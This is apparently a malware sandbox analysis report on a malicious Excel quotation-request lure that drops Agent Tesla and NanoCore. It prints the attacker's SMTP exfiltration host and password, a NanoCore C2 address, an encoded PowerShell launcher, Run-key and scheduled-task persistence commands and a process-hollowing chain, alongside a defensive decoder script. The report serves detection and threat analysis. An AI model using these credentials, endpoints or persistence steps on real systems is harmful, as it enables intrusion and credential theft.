Analysis

max time kernel: 150s
max time network: 135s
platform: windows7_x64
resource: win7-en-20210920
submitted: 26-09-2021 19:12

Tasks
- Static task: static1
- Behavioral task: behavioral1; Sample: RFQ#903_260921_new_request_10012_products.xls; Resource: win7-en-20210920
- Behavioral task: behavioral2; Sample: RFQ#903_260921_new_request_10012_products.xls; Resource: win10v20210408

The behavioural detail below (Office14 paths under Program Files (x86), SysWOW64 binaries) comes from the windows7_x64 run (behavioral1).

General
- Target: RFQ#903_260921_new_request_10012_products.xls
- Size: 38KB
- MD5: 03cf64f6dff8c1467a756d8c2e2fac16
- SHA1: c124554906286cdaa48240a394777b1ef6c853fe
- SHA256: 17b7d30b0960240b297dc208673fd4d8e9bfe52fc68a24785b83dc4b6702dba5
- SHA512: 4d47bc2367459ad55f2c5a91733d729c045035f0d8ad3fefa7f1ba015d68da957efbafd3dbb25a3033fcb4ac539480cc1c5d8d6e4d8baefe61f68caeca25bbb9
Malware Config

Extracted: agenttesla
- Protocol: smtp
- Host: smtp.privateemail.com
- Port: 587
- Username: [email protected] (the address is obscured in this extract and cannot be recovered from the page)
- Password: office12#

These are the exfiltration credentials: Agent Tesla logs in to the attacker's mailbox over SMTP submission (port 587) and mails the harvested data to it, so the host and account are the network indicators to block and the credentials are what the operator loses if the sample is shared.
Extracted: nanocore (NanoCore .NET RAT)
- version: 1.2.2.0
- C2: 185.140.53.52:4488
- mutex: 4457cc23-84d1-4515-bdf3-bc83fe8472db

Full configuration:
- activate_away_mode: true
- backup_connection_host: (empty)
- backup_dns_server: 8.8.4.4
- buffer_size: 65535
- build_time: 2021-07-08T12:51:02.136438436Z
- bypass_user_account_control: false
- bypass_user_account_control_data: PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
- clear_access_control: true
- clear_zone_identifier: false
- connect_delay: 4000
- connection_port: 4488
- default_group: EXPO (the same name as the dropped expo.exe and the "expo" Run value below)
- enable_debug_mode: true
- gc_threshold: 10485760 (reported as 1.048576e+07)
- keep_alive_timeout: 30000
- keyboard_logging: false
- lan_timeout: 2500
- max_packet_size: 10485760 (reported as 1.048576e+07)
- mutex: 4457cc23-84d1-4515-bdf3-bc83fe8472db
- mutex_timeout: 5000
- prevent_system_sleep: false
- primary_connection_host: 185.140.53.52
- primary_dns_server: 8.8.8.8
- request_elevation: true
- restart_delay: 5000
- run_delay: 0
- run_on_startup: false
- set_critical_process: true
- timeout_interval: 5000
- use_custom_dns_server: false
- version: 1.2.2.0
- wan_timeout: 8000

The bypass_user_account_control_data value is a base64-encoded Task Scheduler XML document (it starts with an XML declaration). bypass_user_account_control is false in this build, so that template was not armed in this run; request_elevation and set_critical_process are true.
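The following is an added example, not part of the sandbox report and not NanoCore's own code. It base64-decodes the bypass_user_account_control_data blob (copied verbatim from the extracted configuration above) and summarises the scheduled task it describes. The function names and the summary layout are this example's own.

```python
"""Decode NanoCore's bypass_user_account_control_data blob.

Added example, not from the sandbox report. BYPASS_UAC_DATA is copied verbatim
from the extracted config; the helper names and summary layout are this
example's own.
"""
import base64
import re
import xml.etree.ElementTree as ET

# Copied verbatim from the report's extracted NanoCore config.
BYPASS_UAC_DATA = "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+"

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"


def decode_task_xml(blob: str) -> str:
    """Base64-decode the blob and return the task XML as text.

    The declaration claims encoding="UTF-16", but the decoded bytes are plain
    ASCII, so the declaration is stripped rather than trusted; handing the raw
    bytes to an XML parser would fail on the bogus encoding.
    """
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    text = raw.decode("utf-8")
    return re.sub(r"^\s*<\?xml[^>]*\?>\s*", "", text)


def summarise_task(xml_text: str) -> dict:
    """Pull out the fields that matter for triage of a task-based elevation."""
    root = ET.fromstring(xml_text)

    def field(*path: str):
        node = root.find("/".join(TASK_NS + p for p in path))
        return None if node is None else (node.text or "")

    triggers = root.find(TASK_NS + "Triggers")
    return {
        "logon_type": field("Principals", "Principal", "LogonType"),
        "run_level": field("Principals", "Principal", "RunLevel"),
        "hidden": field("Settings", "Hidden"),
        "command": field("Actions", "Exec", "Command"),
        "arguments": field("Actions", "Exec", "Arguments"),
        "trigger_count": 0 if triggers is None else len(triggers),
    }


if __name__ == "__main__":
    for key, value in summarise_task(decode_task_xml(BYPASS_UAC_DATA)).items():
        print(f"{key:>14}: {value}")
```

The decoded task has no triggers (it is meant to be started on demand), runs under the interactive token with RunLevel HighestAvailable, and executes the placeholder command "#EXECUTABLEPATH" with $(Arg0) as its argument; NanoCore substitutes the real path at registration time. A task registered from this template is therefore an elevated launcher for whatever executable the RAT names, which is why the RunLevel/Command pair is worth pulling out of any NanoCore config you extract.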
Signatures

AgentTesla
Agent Tesla is a .NET information stealer and remote access tool (RAT), originally written in Visual Basic .NET. It harvests credentials from browsers, mail and FTP clients and exfiltrates them over SMTP, FTP or HTTP; the configuration extracted above uses SMTP (smtp.privateemail.com:587).

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here EXCEL.EXE (PID 2008) spawned cmd.exe (PID 1528); with the "Office loads VBA resources" signature below, a macro is the more likely cause.
- description | pid | pid_target | process | target process
- Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 1528 | 2008 | cmd.exe | EXCEL.EXE

AgentTesla Payload (3 IoCs)
- resource | yara_rule
- \Users\Admin\AppData\Roaming\ammero.exe | family_agenttesla
- C:\Users\Admin\AppData\Roaming\ammero.exe | family_agenttesla
- C:\Users\Admin\AppData\Roaming\ammero.exe | family_agenttesla

Downloads MZ/PE file

Executes dropped EXE (3 IoCs)
- pid | process
- 992 | expo.exe
- 1136 | ammero.exe
- 1512 | InstallUtil.exe

Loads dropped DLL (3 IoCs)
- pid | process
- 1176 | ei.exe
- 992 | expo.exe
- 992 | expo.exe

Obfuscated with Agile.Net obfuscator (1 IoC)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
- resource | yara_rule
- behavioral1/memory/1176-67-0x00000000005B0000-0x00000000005D1000-memory.dmp | agile_net

Adds Run key to start application (2 TTPs, 3 IoCs)
- description | ioc | process
- Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\expo = "C:\\Users\\Admin\\AppData\\Roaming\\expo.exe" | reg.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\UDP Subsystem = "C:\\Program Files (x86)\\UDP Subsystem\\udpss.exe" | InstallUtil.exe
Two separate persistence mechanisms: the per-user "expo" value written via reg.exe by the ei.exe stage, and the machine-wide "UDP Subsystem" value written directly by the hollowed InstallUtil.exe.

Checks whether UAC is enabled
(The heading is missing from this extract; the process tree lists the signature under InstallUtil.exe.)
- description | ioc | process
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | InstallUtil.exe

Suspicious use of SetThreadContext (1 IoC)
- description | pid | process | target process
- PID 992 set thread context of 1512 | 992 | expo.exe | InstallUtil.exe
expo.exe writes into a freshly started InstallUtil.exe and then resets its thread context, the process-hollowing pattern; this is why the NanoCore behaviour (UAC check, Program Files drop, Run key, scheduled tasks) is attributed to InstallUtil.exe rather than to expo.exe.

Drops file in Program Files directory (2 IoCs)
- description | ioc | process
- File created | C:\Program Files (x86)\UDP Subsystem\udpss.exe | InstallUtil.exe
- File opened for modification | C:\Program Files (x86)\UDP Subsystem\udpss.exe | InstallUtil.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox attaches a generic "likely ransomware behaviour" note to this signature; nothing else in this report supports that reading, so treat it here as reconnaissance by the RAT, not as ransomware.

Office loads VBA resources, possible macro or embedded object present

Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution. The two tasks here are "UDP Subsystem" and "UDP Subsystem Task", both registered by InstallUtil.exe from XML files in the user's Temp directory (see the process tree).

Enumerates system info in registry (2 TTPs, 1 IoC)
- description | ioc | process
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
This is performed by EXCEL.EXE itself, not by the dropped payloads.
Modifies Internet Explorer settings
(The heading is missing from this extract; the process tree lists the signature under EXCEL.EXE.) Every operation below is performed by EXCEL.EXE. MACHINE stands for \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer and USER for \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer. The binary "command" value, written twice, is given once as WORD_BLOB:
- WORD_BLOB = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000

- description | ioc
- Key deleted | MACHINE\Default HTML Editor
- Key created | MACHINE\Default HTML Editor
- Key deleted | MACHINE\Default MHTML Editor\shell\edit\COMMAND
- Key created | MACHINE\Default HTML Editor\shell\edit\command
- Key deleted | MACHINE\Default MHTML Editor\shell\edit
- Key created | USER\MenuExt\Se&nd to OneNote
- Set value (int) | USER\MenuExt\Se&nd to OneNote\Contexts = "55"
- Key deleted | MACHINE\Default HTML Editor\shell\edit
- Key created | MACHINE\Default HTML Editor\shell\edit
- Set value (str) | MACHINE\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
- Key created | USER\Toolbar
- Key created | MACHINE\Default HTML Editor\shell
- Set value (data) | MACHINE\Default HTML Editor\shell\edit\command\command = WORD_BLOB
- Key created | MACHINE\Default MHTML Editor
- Set value (str) | USER\Toolbar\ShowDiscussionButton = "Yes"
- Set value (str) | USER\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
- Key created | USER\MenuExt\E&xport to Microsoft Excel
- Key deleted | MACHINE\Default HTML Editor\shell\edit\COMMAND
- Key created | USER\MenuExt
- Set value (str) | USER\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
- Set value (str) | MACHINE\Default HTML Editor\shell\edit\ = "&Edit"
- Key deleted | MACHINE\Default MHTML Editor
- Key created | MACHINE\Default MHTML Editor\shell\edit\command
- Key deleted | MACHINE\Default HTML Editor\shell
- Set value (str) | MACHINE\Default MHTML Editor\shell\edit\ = "&Edit"
- Set value (data) | MACHINE\Default MHTML Editor\shell\edit\command\command = WORD_BLOB
- Set value (int) | USER\MenuExt\E&xport to Microsoft Excel\Contexts = "1"
- Key deleted | MACHINE\Default MHTML Editor\shell
- Key created | MACHINE\Default MHTML Editor\shell
- Key created | MACHINE\Default MHTML Editor\shell\edit
- Set value (str) | MACHINE\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""

WORD_BLOB is UTF-16LE text: xb'BV5!!!!!!!!!MKKSkWORDFiles>bi$T!V!0Z={Pk0vm~AZu /n "%1". That is a Windows Installer "Darwin descriptor" (compressed product/feature/component identifier) that Office registers for install-on-demand of its shell verbs. All of these IE keys are Office 2010 first-run registration noise from EXCEL.EXE, not attacker activity.
Modifies registry class (64 IoCs)
Every operation below is performed by EXCEL.EXE and every key is under \REGISTRY\MACHINE\SOFTWARE\Classes. The three binary "command" values are given once:
- WORD_BLOB = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
- EXCEL_BLOB = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
- PUB_BLOB = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000

- description | ioc
- Set value (str) | .htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"
- Key created | mhtmlfile\ShellEx
- Key created | Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile
- Key created | .mht\OpenWithList\Microsoft Word
- Set value (str) | .mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"
- Set value (str) | .htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"
- Key created | .htm\OpenWithList\Microsoft Excel
- Set value (data) | .htm\OpenWithList\Excel.exe\shell\edit\command\command = EXCEL_BLOB
- Key created | .htm\OpenWithList\MSPub.exe\shell\edit
- Set value (data) | .htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = PUB_BLOB
- Set value (str) | mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"
- Key created | .mht\OpenWithList\Microsoft Publisher
- Key deleted | htmlfile\shell\Print
- Key created | .htm\OpenWithList\Microsoft Excel\shell\edit\command
- Key created | mhtmlfile\shell\Print\command
- Key created | mhtmlfile\shellex\IconHandler
- Set value (data) | .mht\OpenWithList\Microsoft Word\shell\edit\command\command = WORD_BLOB
- Key created | .mht\OpenWithList\Excel.exe\shell\edit\command
- Key deleted | htmlfile\shell\Print\command
- Set value (str) | htmlfile\shell\Print\ = "&Print"
- Key created | Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32
- Key created | .htm\OpenWithList\Microsoft Word\shell\edit\command
- Key created | .mht\OpenWithList\Microsoft Word\shell\edit
- Set value (str) | .mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
- Set value (str) | .htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"
- Key deleted | mhtmlfile\shell\Edit\command
- Set value (str) | .mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"
- Set value (str) | .mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"
- Set value (str) | .mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"
- Key created | Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}
- Key created | htmlfile\shell\Edit
- Key created | .htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic
- Key created | mhtmlfile
- Key created | .mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic
- Set value (str) | .mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"
- Key created | htmlfile\shell\Edit\command
- Key created | .htm
- Set value (str) | .htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"
- Key created | .htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec
- Set value (str) | .htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"
- Set value (str) | mhtmlfile\shell\Print\ = "&Print"
- Key deleted | htmlfile\shell\Edit
- Set value (str) | htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"
- Key created | htmlfile\shell\Print\command
- Set value (str) | mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"
- Key created | .mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec
- Key created | .htm\OpenWithList\WinWord.exe\shell\edit\command
- Key created | mhtmlfile\shell\Print
- Set value (str) | .mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"
- Set value (str) | htmlfile\shell\Edit\ = "&Edit"
- Key created | .htm\OpenWithList\Microsoft Excel\shell\edit
- Key created | .htm\OpenWithList\Excel.exe\shell\edit\ddeexec
- Key created | .mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic
- Key created | .mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application
- Set value (str) | .mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"
- Set value (str) | .htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
- Key created | .htm\OpenWithList\Microsoft Publisher
- Key created | .htm\OpenWithList\MSPub.exe
- Set value (str) | .htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"
- Key created | mhtmlfile\DefaultIcon
- Set value (data) | .mht\OpenWithList\WinWord.exe\shell\edit\command\command = WORD_BLOB
- Key deleted | htmlfile\shell\Edit\command
- Set value (str) | mhtmlfile\DefaultIcon\ = "\"%1\""
- Key created | .mht\OpenWithList\Microsoft Excel\shell\edit

Decoded as UTF-16LE, the blobs read xb'BV5!!!!!!!!!MKKSkWORDFiles>bi$T!V!0Z={Pk0vm~AZu /n "%1", xb'BV5!!!!!!!!!MKKSkEXCELFiles>VijqBof(Y8'w!FId1gLQ /dde and xb'BV5!!!!!!!!!MKKSkPubPrimary>R$nujSWFe?}aLrRp9x@W %1: Windows Installer Darwin descriptors for Word, Excel and Publisher. Like the Internet Explorer keys above, these 64 entries are Office's own .htm/.mht file-association registration on first launch and carry no information about the payload.
Suspicious behavior: AddClipboardFormatListener (1 IoC)
- pid | process
- 2008 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (16 IoCs)
- pid | process | occurrences
- 1884 | powershell.exe | 1
- 1176 | ei.exe | 5
- 992 | expo.exe | 2
- 1136 | ammero.exe | 2
- 1512 | InstallUtil.exe | 6

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
- pid | process
- 1512 | InstallUtil.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
- description | pid | process
- Token: SeDebugPrivilege | 1884 | powershell.exe
- Token: SeDebugPrivilege | 1176 | ei.exe
- Token: SeDebugPrivilege | 992 | expo.exe
- Token: SeDebugPrivilege | 1136 | ammero.exe
- Token: SeDebugPrivilege | 1512 | InstallUtil.exe
Every stage of the chain enables SeDebugPrivilege, which is what the loaders need to open and write other processes (see WriteProcessMemory below).

Suspicious use of FindShellTrayWindow (2 IoCs)
- pid | process | occurrences
- 2008 | EXCEL.EXE | 2

Suspicious use of SetWindowsHookEx (3 IoCs)
- pid | process | occurrences
- 2008 | EXCEL.EXE | 3

Suspicious use of WriteProcessMemory (48 IoCs)
- pid | process | target pid | target process | writes
- 2008 | EXCEL.EXE | 1528 | cmd.exe | 4
- 1528 | cmd.exe | 1884 | powershell.exe | 4
- 1884 | powershell.exe | 1176 | ei.exe | 4
- 1176 | ei.exe | 1060 | cmd.exe | 4
- 1060 | cmd.exe | 944 | reg.exe | 4
- 1176 | ei.exe | 992 | expo.exe | 4
- 992 | expo.exe | 1136 | ammero.exe | 4
- 992 | expo.exe | 1512 | InstallUtil.exe | 12
- 1512 | InstallUtil.exe | 1900 | schtasks.exe | 4
- 1512 | InstallUtil.exe | 968 | schtasks.exe | 4
Every ordinary parent/child launch is recorded as four writes. The expo.exe -> InstallUtil.exe edge stands out with three times as many, which together with the SetThreadContext call on the same pair is the process-hollowing signature: expo.exe starts a legitimate-looking InstallUtil.exe, overwrites its image, and redirects its main thread.
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 2008)
  "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ#903_260921_new_request_10012_products.xls
  Signatures: Enumerates system info in registry; Modifies Internet Explorer settings; Modifies registry class; Suspicious behavior: AddClipboardFormatListener; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 1528)
    "C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E 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
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1884)
      PoWERSheLL -E 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
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\ei.exe (PID 1176)
        "C:\Users\Admin\AppData\Local\Temp\ei.exe"
        Signatures: Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe (PID 1060)
          "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\reg.exe (PID 944)
            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"
            Signatures: Adds Run key to start application
        - C:\Users\Admin\AppData\Roaming\expo.exe (PID 992)
          "C:\Users\Admin\AppData\Roaming\expo.exe"
          Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Roaming\ammero.exe (PID 1136)
            "C:\Users\Admin\AppData\Roaming\ammero.exe"
            Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe (PID 1512)
            "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
            Signatures: Executes dropped EXE; Adds Run key to start application; Checks whether UAC is enabled; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            - C:\Windows\SysWOW64\schtasks.exe (PID 1900)
              "schtasks.exe" /create /f /tn "UDP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmpA4C.tmp"
              Signatures: Creates scheduled task(s)
            - C:\Windows\SysWOW64\schtasks.exe (PID 968)
              "schtasks.exe" /create /f /tn "UDP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC02.tmp"
              Signatures: Creates scheduled task(s)

